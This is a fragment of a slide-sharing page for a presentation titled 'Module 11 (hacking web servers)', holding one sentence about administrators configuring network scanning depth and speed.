system administrators manage scanning depth and other options to make benefit of speed-
optimized network scanning without any loss in scanning quality.

Module 11 (hacking web servers)

Module 11 (hacking web servers)

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Module 11 (hacking web servers)

Similar to Module 11 (hacking web servers) (20)

More from Wail Hassan

More from Wail Hassan (20)

Recently uploaded

Recently uploaded (20)

Module 11 (hacking web servers)